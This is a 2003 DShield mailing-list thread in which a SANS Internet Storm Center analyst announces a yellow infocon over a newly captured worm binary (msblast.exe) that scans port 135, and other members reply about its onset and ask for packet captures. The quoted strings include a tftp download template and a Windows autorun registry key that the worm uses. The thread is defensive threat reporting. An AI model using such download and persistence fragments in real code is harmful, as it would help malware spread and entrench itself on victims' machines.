[Dshield] infocon: yellow

Chris Ream chrisr at stopthemcold.com
Mon Aug 11 21:01:05 GMT 2003


Has anyone captured the packet stream? I've got some sensors listening
but have not yet seen it. I would like to reconstruct it and disassemble
it to find out exactly what it's doing.

If anyone has captured it and is willing to share it I would greatly
appreciate it.

Chris Ream
Synaptek Network Security.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Andy Hopkins
Sent: Monday, August 11, 2003 2:28 PM
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow

FYI: Its started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow


This message was converted from multipart/signed to ascii armored
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----

--
SHA1
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list